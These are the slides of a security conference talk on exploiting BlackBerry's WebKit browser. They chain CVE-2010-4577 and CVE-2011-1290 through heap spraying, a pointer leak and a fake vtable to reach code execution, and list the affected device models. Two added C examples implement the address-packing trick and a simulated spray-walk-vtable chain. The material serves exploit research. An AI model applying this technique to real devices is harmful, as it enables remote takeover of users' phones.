BLACKBERRY PWNAGE THE BLUEJAY STRIKES Federico Muttis Core Security Technologies Session ID: HTA-T19 Session Classification: Advanced
INFO @ THE MEDIA http://www.zdnet.com/blog/security/pwn2own-2011-blackberry-falls-to-webkit-browser-attack/8401 http://threatpost.com/en_us/blogs/iphone-blackberry-fall-second-day-pwn2own-031011
BLACKBERRY DEVICES WITH KNOWN WORKING EXPLOIT
Vulnerable devices (shortened list):
- Pearl family
- Curve family (< 9350)
- Storm family
- Style 9670
- Tour 9630
- Bold 9650/9700/9780
- Torch 9800
CVE-2010-4577 ARBITRARY READ
CVE-2010-4577 PROOF OF CONCEPT CSS Font Face Parsing Type Confusion Vulnerability http://code.google.com/p/chromium/issues/detail?id=63866
IEEE 754 DOUBLE PRECISION FLOATING-POINT
CVE-2010-4577 CRASH ANALYSIS
CSS Font Face Parsing Type Confusion Vulnerability (WinDbg stack frames, callee first):
002ed594 80000000 01718618 chrome_68390000!wtf::stringimpl::create(wchar_t * characters = 0x80000000 "--- memory read error at address 0x80000000 ---", unsigned int length = 0x2cb)+0x24 [c:\b\slave\chrome-official\build\src\third_party\webkit\javascriptcore\wtf\text\stringimpl.cpp @ 99]
80000000 41400000 00000454 chrome_68390000!wtf::string::string(wchar_t * characters = 0x80000000 "--- memory read error at address 0x80000000 ---", unsigned int length = 0x41400000)+0x21
CVE-2010-4577 EXPLOITATION
CSS Font Face Parsing Type Confusion Vulnerability (figure: the attacker-controlled Address and Size fields)
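Added example, not code from the talk or from BlueJay: how a single IEEE 754 double can carry the (address, size) pair the exploitation slide names. The layout assumed here (little-endian 32-bit process; low dword read as the characters pointer, high dword as the length) is inferred from the crash frame above, where the confused string code saw characters = 0x80000000 and length = 0x41400000, i.e. the bit pattern of the double 2097153.0. The struct and function names are this example's own.

```c
/* Added example, not the talk's code: one IEEE 754 double carrying a
 * (pointer, length) pair that a type-confused string constructor later
 * reads as a string descriptor. Layout (low dword = characters pointer,
 * high dword = length, little-endian 32-bit process) is an assumption
 * taken from the crash frame: characters = 0x80000000, length = 0x41400000. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    uint32_t characters;  /* the wchar_t* the confused code dereferences */
    uint32_t length;      /* the unsigned int it passes as the length    */
} fake_string_desc;

/* Build the double whose raw bits are {length, address}. */
double pack_addr_size(uint32_t address, uint32_t length) {
    uint64_t bits = ((uint64_t)length << 32) | address;
    double d;
    memcpy(&d, &bits, sizeof d);
    return d;
}

/* Reinterpret the double's bits the way the confused string code does. */
fake_string_desc unpack_addr_size(double d) {
    uint64_t bits;
    fake_string_desc s;
    memcpy(&bits, &d, sizeof bits);
    s.characters = (uint32_t)(bits & 0xffffffffu);
    s.length     = (uint32_t)(bits >> 32);
    return s;
}

/* Caveat: a length that sets all eleven exponent bits makes the double
 * NaN or Inf, and a NaN may be canonicalised somewhere between the CSS
 * text and the confused read, destroying the payload. Returns 1 when the
 * pair survives as a finite double. */
int pair_is_finite(uint32_t address, uint32_t length) {
    double d = pack_addr_size(address, length);
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return ((bits >> 52) & 0x7ffu) != 0x7ffu;
}

int main(void) {
    double d = pack_addr_size(0x80000000u, 0x41400000u);
    fake_string_desc s = unpack_addr_size(d);
    printf("%.17g encodes characters=0x%08x length=0x%08x (finite=%d)\n",
           d, s.characters, s.length,
           pair_is_finite(0x80000000u, 0x41400000u));
    return 0;
}
```

The practical consequence of the finiteness check: the length field is the high dword, so any length at or above 0x7ff00000 (and any in the 0xfff00000 range) cannot be delivered through a double without risking canonicalisation; the 0x41400000 seen in the crash is comfortably finite.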
A BLUEJAY APPEARS!
DUMPING THE VIRTUAL ADDRESS SPACE
BlueJay's early problems; the poor man's solution
BLUEJAY AGENT DIAGRAM
BlueJay Agent (in the browser) <-- HTTP push --> BlueJay Server & Console
Server & Console: exploit dispatcher, memory manager
Agent primitives: memory read, pointer leak, execute code, HTML5 spray, HTML5 edit
DUMPING THE VIRTUAL ADDRESS SPACE
BlueJay's helper: a Java BlackBerry app that loops on "Browser running?"
- No: restart the browser
- Yes: reset the backlight timer
DUMPING DEMO
DISASSEMBLING AND SEARCHING FOR OLYMPIA
BlackBerry's WebKit browser: main() routine
DISASSEMBLING AND LOCATING CVE-2010-4577 CVE-2010-4577 Arbitrary memory read disassembly
BLACKBERRY PROCESS INTERNALS
Some syscalls (work in progress...):
0x4   write
0x16  allocexecmem
0x27  loadlibrary
0x28  shmget
0x29  shmat
0x2b  alloc
0x2c  sem_create
0x2d  sem_unlink / sem_close
0x41  sendto?
0x46  mkfifo?
0x4a  unlink
0x4c  mkdir
0x5f  open
0x61  lock related (flock/lockf?)
0x67  threads related
CVE-2011-1290 CODE EXECUTION
SEARCHING FOR THE VULNERABILITIES
Webkit Integer Overflow near 2011
"There is a buffer overflow vulnerability that was released in November 2010 but is still present on the BlackBerry. ( ). To exploit the vulnerability I have to set up the heap in a specific way so I can overflow a specific structure on the heap. This structure is the internal representation for a piece of text on a website. The vulnerability is in the handling of the text nodes, so this is a good target to overflow. ( ) Once I have a stable way to organize the heap and reliably overflow the pointer to the functions, we can start testing. The first test attempts to redirect execution to code that already exists on the BlackBerry. Instead of the JavaScript nodetype call returning the value 3, I redirect it to existing code elsewhere that returns 0. Now I can control the execution flow in the browser."
- Willem Pinckaers
EXPLOITING CVE-2011-1290
CVE-2011-1290: Integer Overflow => Heap Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow => Heap Overflow
CHAINING THE EXPLOITS
EXPLOITATION RECIPE
1. HTML5-Spray the process's heap with a repeated pattern (each HTML5-Spray block: signature signature signature ...)
2. Leak a heap pointer using CVE-2011-0195 (a pointer to a valid heap address)
3. Walk between [ptr-128k, ptr+128k] looking for the signature (yields a pointer to an HTML5-Sprayed block, "sigptr")
4. HTML5-Spray-Modify to fake a vtable inside that block: slots sigptr+x, sigptr+y, ... pointing at shellcode placed in the same block
5. Point the code execution exploit to your block
6. Achieve code execution!
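Added example, not BlueJay's code: steps 1, 3, 4 and 5 of the recipe run over a constructed in-memory image, so the walk and the fake vtable can be checked offline. read32() stands in for the CVE-2011-0195 read primitive, write32() for the HTML5-Spray and HTML5-Spray-Modify primitives; the signature word, the 16-word run length, the image size, the spray address and the leaked pointer are all assumptions of this example. The walk is bounded to [ptr-128k, ptr+128k] as on the slide and treats unmapped addresses as "no signature" instead of faulting.

```c
/* Added example, not BlueJay's code: the spray / walk / fake-vtable chain
 * simulated over a constructed 512 KiB memory image. Everything below the
 * defines (signature value, run length, addresses) is an assumption. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define MEM_BASE   0x10000000u          /* constructed image base          */
#define MEM_SIZE   (512u * 1024u)       /* constructed image size          */
#define WINDOW     (128u * 1024u)       /* 128k either side of the leak    */
#define SIGNATURE  0x4a41594au          /* spray marker word (assumed)     */
#define SIG_RUN    16                   /* marker words that prove a block */

static uint8_t g_mem[MEM_SIZE];         /* stand-in for the process heap   */

/* Arbitrary read primitive (CVE-2011-0195 stand-in): 0 = unmapped. */
int read32(uint32_t addr, uint32_t *out) {
    if (addr & 3u) return 0;
    if (addr < MEM_BASE || addr - MEM_BASE + 4u > MEM_SIZE) return 0;
    memcpy(out, g_mem + (addr - MEM_BASE), 4u);
    return 1;
}

/* Write primitive (HTML5-Spray / HTML5-Spray-Modify stand-in). */
int write32(uint32_t addr, uint32_t val) {
    if (addr & 3u) return 0;
    if (addr < MEM_BASE || addr - MEM_BASE + 4u > MEM_SIZE) return 0;
    memcpy(g_mem + (addr - MEM_BASE), &val, 4u);
    return 1;
}

/* Step 1: one HTML5-Spray block of 'words' SIGNATURE words at 'at'. */
int spray_block(uint32_t at, uint32_t words) {
    for (uint32_t i = 0; i < words; i++)
        if (!write32(at + 4u * i, SIGNATURE)) return 0;
    return 1;
}

/* Step 3: scan [ptr-128k, ptr+128k] and return the address that starts
 * SIG_RUN consecutive SIGNATURE words, or 0. An unmapped or non-matching
 * word just ends the current run; clamping keeps the window in 32 bits. */
uint32_t find_spray_block(uint32_t leaked_ptr) {
    uint64_t lo = leaked_ptr > WINDOW ? (uint64_t)leaked_ptr - WINDOW : 0;
    uint64_t hi = (uint64_t)leaked_ptr + WINDOW;
    uint32_t run = 0, run_start = 0, w;
    for (uint64_t a = lo & ~3ull; a < hi && a <= 0xffffffffull; a += 4) {
        if (read32((uint32_t)a, &w) && w == SIGNATURE) {
            if (run == 0) run_start = (uint32_t)a;
            if (++run == SIG_RUN) return run_start;
        } else {
            run = 0;
        }
    }
    return 0;
}

/* Step 4: turn the start of the found block into a fake vtable whose
 * slots all point at sigptr + shellcode_off, inside the same block. */
int build_fake_vtable(uint32_t sigptr, uint32_t nslots, uint32_t shellcode_off) {
    for (uint32_t i = 0; i < nslots; i++)
        if (!write32(sigptr + 4u * i, sigptr + shellcode_off)) return 0;
    return 1;
}

/* Step 5: the object corrupted by the heap overflow now carries
 * vptr = sigptr; a virtual call through 'slot' resolves to this. */
uint32_t resolve_virtual(uint32_t vptr, uint32_t slot) {
    uint32_t target = 0;
    read32(vptr + 4u * slot, &target);
    return target;
}

/* Whole chain on the constructed image; returns the resolved call target. */
uint32_t run_chain(void) {
    const uint32_t spray_at = MEM_BASE + 0x30000u;   /* assumed block address */
    const uint32_t leaked   = spray_at + 0x0a000u;   /* assumed leaked pointer */
    if (!spray_block(spray_at, 0x4000u)) return 0;   /* 64 KiB of marker */
    uint32_t sigptr = find_spray_block(leaked);
    if (!sigptr) return 0;
    if (!build_fake_vtable(sigptr, 8u, 0x1000u)) return 0;
    return resolve_virtual(sigptr, 3u);
}

int main(void) {
    printf("virtual call resolves to 0x%08x\n", run_chain());
    return 0;
}
```

Two details matter on a real device and are why the walk is written this way: the leaked pointer is only "near" a sprayed block, so the scan has to tolerate unrelated heap data between it and the block, and a read primitive that faults on an unmapped page would take the browser down mid-walk, which is exactly the restart loop the BlueJay helper app exists for.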
BLUEJAY VS REAL DEVICE
(figure: HTML5-Spray block layout on the device, with sigptr and shellcode)
BLUEJAY VS SIMULATOR DEMO
SIMULATOR VS DEVICE
WebKit's StyleElement::process()
http://immunityinc.com/infiltrate/archives/webkit_heap.pdf
Q & A E-mail: fmuttis@gmail.com / acid@coresecurity.com Twitter: @acid_